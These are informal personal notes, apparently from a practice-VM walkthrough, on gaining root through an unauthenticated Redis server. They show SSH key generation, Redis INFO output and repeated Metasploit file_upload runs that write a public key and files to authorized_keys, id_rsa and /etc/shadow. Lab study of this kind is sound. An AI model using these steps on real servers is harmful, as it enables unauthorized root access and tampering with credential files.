<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Redis</title>
</head><body>redis<br/>
<br/>
command list<br/>
<br/>
http://redis.io/commands<br/>
http://blaszczakm.blogspot.com/2016/03/kevgir-vm-writeup.html<br/>
http://blog.knownsec.com/2015/11/analysis-of-redis-unauthorized-of-expolit/ &nbsp;&lt;-- detailed<br/>
<br/>
--------------------------------------<br/>
<br/>
Commands I used, and work from ~ directory<br/>
<br/>
ssh-keygen -t rsa<br/>
<br/>
* You will be asked<br/>
<br/>
Enter file in which to save the key (/root/.ssh/id_rsa): <br/>
/root/.ssh/id_rsa already exists.<br/>
Overwrite (y/n)? y<br/>
Enter passphrase (empty for no passphrase): <br/>
Enter same passphrase again: <br/>
Your identification has been saved in /root/.ssh/id_rsa.<br/>
Your public key has been saved in /root/.ssh/id_rsa.pub.<br/>
<br/>
*******When you are asked the above I just hit enter to get all defaults -- then I get the following output<br/>
<br/>
<br/>
Your public key has been saved in /root/.ssh/id_rsa.pub.<br/>
The key fingerprint is:<br/>
SHA256:j2G4Ol5LoJR9bgy808TvXz8W56KVp/o/leF9uWcKl3c root@kali<br/>
<br/>
***Now I enter<br/>
<br/>
(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") &gt; /root/Desktop/foo.txt &nbsp;&lt;--this will output <br/>
<br/>
the keygen to the desktop<br/>
<br/>
to be continued<br/>
<br/>
---------------------------------<br/>
<br/>
&nbsp;<br/>
<br/>
<br/>
<br/>
<br/>
<br/>
4) redis hacking<br/>
root@kali:~# redis-cli -h 10.0.1.3<br/>
10.0.1.3:6379&gt; INFO<br/>
# Server<br/>
redis_version:3.0.7<br/>
redis_git_sha1:00000000<br/>
redis_git_dirty:0<br/>
redis_build_id:aa70bcb321ba8313<br/>
redis_mode:standalone<br/>
os:Linux 3.19.0-25-generic i686<br/>
arch_bits:32<br/>
multiplexing_api:epoll<br/>
gcc_version:4.8.4<br/>
process_id:1215<br/>
run_id:f77a1654a20f1a67cadbe83761f0bd907ce01e0e<br/>
tcp_port:6379<br/>
uptime_in_seconds:4070<br/>
uptime_in_days:0<br/>
hz:10<br/>
lru_clock:15370196<br/>
config_file:/etc/redis/6379.conf<br/>
<br/>
# Clients<br/>
connected_clients:2<br/>
client_longest_output_list:0<br/>
client_biggest_input_buf:0<br/>
blocked_clients:0<br/>
<br/>
# Memory<br/>
used_memory:659136<br/>
used_memory_human:643.69K<br/>
used_memory_rss:9306112<br/>
used_memory_peak:687064<br/>
used_memory_peak_human:670.96K<br/>
used_memory_lua:24576<br/>
mem_fragmentation_ratio:14.12<br/>
mem_allocator:jemalloc-3.6.0<br/>
<br/>
# Persistence<br/>
loading:0<br/>
rdb_changes_since_last_save:1<br/>
rdb_bgsave_in_progress:0<br/>
rdb_last_save_time:1458210485<br/>
rdb_last_bgsave_status:ok<br/>
rdb_last_bgsave_time_sec:0<br/>
rdb_current_bgsave_time_sec:-1<br/>
aof_enabled:0<br/>
aof_rewrite_in_progress:0<br/>
aof_rewrite_scheduled:0<br/>
aof_last_rewrite_time_sec:-1<br/>
aof_current_rewrite_time_sec:-1<br/>
aof_last_bgrewrite_status:ok<br/>
aof_last_write_status:ok<br/>
<br/>
# Stats<br/>
total_connections_received:21<br/>
total_commands_processed:74<br/>
instantaneous_ops_per_sec:0<br/>
total_net_input_bytes:6574<br/>
total_net_output_bytes:22122<br/>
instantaneous_input_kbps:0.00<br/>
instantaneous_output_kbps:0.00<br/>
rejected_connections:0<br/>
sync_full:0<br/>
sync_partial_ok:0<br/>
sync_partial_err:0<br/>
expired_keys:0<br/>
evicted_keys:0<br/>
keyspace_hits:0<br/>
keyspace_misses:0<br/>
pubsub_channels:0<br/>
pubsub_patterns:0<br/>
latest_fork_usec:14331<br/>
migrate_cached_sockets:0<br/>
<br/>
# Replication<br/>
role:master<br/>
connected_slaves:0<br/>
master_repl_offset:0<br/>
repl_backlog_active:0<br/>
repl_backlog_size:1048576<br/>
repl_backlog_first_byte_offset:0<br/>
repl_backlog_histlen:0<br/>
<br/>
# CPU<br/>
used_cpu_sys:34.07<br/>
used_cpu_user:0.28<br/>
used_cpu_sys_children:0.02<br/>
used_cpu_user_children:0.00<br/>
<br/>
# Cluster<br/>
cluster_enabled:0<br/>
<br/>
# Keyspace<br/>
db0:keys=2,expires=0,avg_ttl=0<br/>
10.0.1.3:6379&gt;<br/>
<br/>
<br/>
(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") &gt; foo.txt/.ssh"<br/>
<br/>
Module options (auxiliary/scanner/redis/file_upload):<br/>
<br/>
&nbsp; &nbsp;Name &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;Current Setting &nbsp;Required &nbsp;Description<br/>
&nbsp; &nbsp;---- &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;--------------- &nbsp;-------- &nbsp;-----------<br/>
&nbsp; &nbsp;DISABLE_RDBCOMPRESSION &nbsp;true &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; yes &nbsp; &nbsp; &nbsp; Disable compression when saving if found to be enabled<br/>
&nbsp; &nbsp;LocalFile &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;no &nbsp; &nbsp; &nbsp; &nbsp;Local file to be uploaded<br/>
&nbsp; &nbsp;Password &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;foobared &nbsp; &nbsp; &nbsp; &nbsp; no &nbsp; &nbsp; &nbsp; &nbsp;Redis password for authentication test<br/>
&nbsp; &nbsp;RHOSTS &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; yes &nbsp; &nbsp; &nbsp; The target address range or CIDR identifier<br/>
&nbsp; &nbsp;RPORT &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 6379 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; yes &nbsp; &nbsp; &nbsp; The target port<br/>
&nbsp; &nbsp;RemoteFile &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; no &nbsp; &nbsp; &nbsp; &nbsp;Remote file path<br/>
&nbsp; &nbsp;THREADS &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 1 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;yes &nbsp; &nbsp; &nbsp; The number of concurrent threads<br/>
<br/>
msf auxiliary(file_upload) &gt; set RHOSTS 10.0.1.3<br/>
RHOSTS =&gt; 10.0.1.3<br/>
msf auxiliary(file_upload) &gt; exploit<br/>
<br/>
[-] Auxiliary failed: RuntimeError bad-config: LocalFile must be set<br/>
[-] Call stack:<br/>
[-] &nbsp; /usr/share/metasploit-framework/lib/msf/core/module.rb:291:in `fail_with'<br/>
[-] &nbsp; /usr/share/metasploit-framework/modules/auxiliary/scanner/redis/file_upload.rb:150:in `run_host'<br/>
[-] &nbsp; /usr/share/metasploit-framework/lib/msf/core/auxiliary/scanner.rb:121:in `block (2 levels) in run'<br/>
[-] &nbsp; /usr/share/metasploit-framework/lib/msf/core/thread_manager.rb:100:in `block in spawn'<br/>
[*] Auxiliary module execution completed<br/>
msf auxiliary(file_upload) &gt; set LocalFile /root/.ssh/foo.txt<br/>
LocalFile =&gt; /root/.ssh/foo.txt<br/>
msf auxiliary(file_upload) &gt; set RemoteFile /root/.ssh/authorized_keys<br/>
RemoteFile =&gt; /root/.ssh/authorized_keys<br/>
msf auxiliary(file_upload) &gt; exploit<br/>
<br/>
[-] 10.0.1.3:6379 &nbsp; &nbsp; &nbsp; &nbsp; - 10.0.1.3:6379 &nbsp; &nbsp; &nbsp; &nbsp; -- failed to save 392 bytes to /root/.ssh/authorized_keys (permissions?)<br/>
[*] Scanned 1 of 1 hosts (100% complete)<br/>
[*] Auxiliary module execution completed<br/>
msf auxiliary(file_upload) &gt; set RemoteFile /root/.ssh/id_rsa<br/>
RemoteFile =&gt; /root/.ssh/id_rsa<br/>
msf auxiliary(file_upload) &gt; exploit<br/>
<br/>
[+] 10.0.1.3:6379 &nbsp; &nbsp; &nbsp; &nbsp; - 10.0.1.3:6379 &nbsp; &nbsp; &nbsp; &nbsp; -- saved 392 bytes inside of redis DB at /root/.ssh/id_rsa<br/>
[*] Scanned 1 of 1 hosts (100% complete)<br/>
[*] Auxiliary module execution completed<br/>
msf auxiliary(file_upload) &gt; set RemoteFile /etc/shadow<br/>
RemoteFile =&gt; /etc/shadow<br/>
msf auxiliary(file_upload) &gt; exploit<br/>
<br/>
[+] 10.0.1.3:6379 &nbsp; &nbsp; &nbsp; &nbsp; - 10.0.1.3:6379 &nbsp; &nbsp; &nbsp; &nbsp; -- saved 392 bytes inside of redis DB at /etc/shadow<br/>
[*] Scanned 1 of 1 hosts (100% complete)<br/>
[*] Auxiliary module execution completed<br/>
msf auxiliary(file_upload) &gt; set LocalFile /etc/shadow<br/>
LocalFile =&gt; /etc/shadow<br/>
msf auxiliary(file_upload) &gt; set RemoteFile /etc/shadow<br/>
RemoteFile =&gt; /etc/shadow<br/>
msf auxiliary(file_upload) &gt; exploit<br/>
<br/>
[+] 10.0.1.3:6379 &nbsp; &nbsp; &nbsp; &nbsp; - 10.0.1.3:6379 &nbsp; &nbsp; &nbsp; &nbsp; -- saved 1664 bytes inside of redis DB at /etc/shadow<br/>
[*] Scanned 1 of 1 hosts (100% complete)<br/>
[*] Auxiliary module execution completed<br/>
msf auxiliary(file_upload) &gt;<br/>
<br/>
<br/>
DONE<br/>
&nbsp;i logged in to VM on root.</body></html>